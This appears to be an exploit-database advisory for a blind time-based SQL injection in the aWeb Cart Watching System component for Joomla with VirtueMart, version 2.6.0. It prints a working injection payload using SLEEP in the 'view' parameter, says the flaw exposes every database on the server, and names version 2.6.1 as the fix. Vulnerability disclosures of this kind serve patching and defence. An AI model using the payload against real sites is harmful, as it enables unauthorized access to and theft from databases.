Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection

2016-12-28 21:05:08

# Exploit Title: Sqli Blind Timebased on Joomla + Viertuemart + aweb-cartwatching-system/aweb-cartwatching <= 2.6.0
# Date: 28-12-2016
# Software Link: http://awebsupport.com/products/aweb-cartwatching-system
# Exploit Author: Javi Espejo(qemm)
# Contact: http://twitter.com/javiespejo
# Website: http://raipson.com
# CVE: REQUESTED
# Category: webapps

1. Description

Any remote user can access to the victim server trough a SQLI Blind Injection on a component of aweb_cartwatching_system and aweb_cart_autosave
This the code that has the parameters with the parameters not sanitized

2. Proof of Concept

option=com_virtuemart&view=categorysearch' RLIKE (SELECT * FROM (SELECT(SLEEP(5)))sgjA) AND 'jHwz'='jHwz&task=smartSearch and it works and I can access to every database on the client system launching other queries.

3. Solution:

Update to version 2.6.1 from the update center of joomla.
The Joomla vel publish the vulnerability on
Answer from Joomla VEL "We have added it to the VEL here: https://vel.joomla.org/resolved/1897-aweb-cart-watching-system-2-6-0
http://awebsupport.com/

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.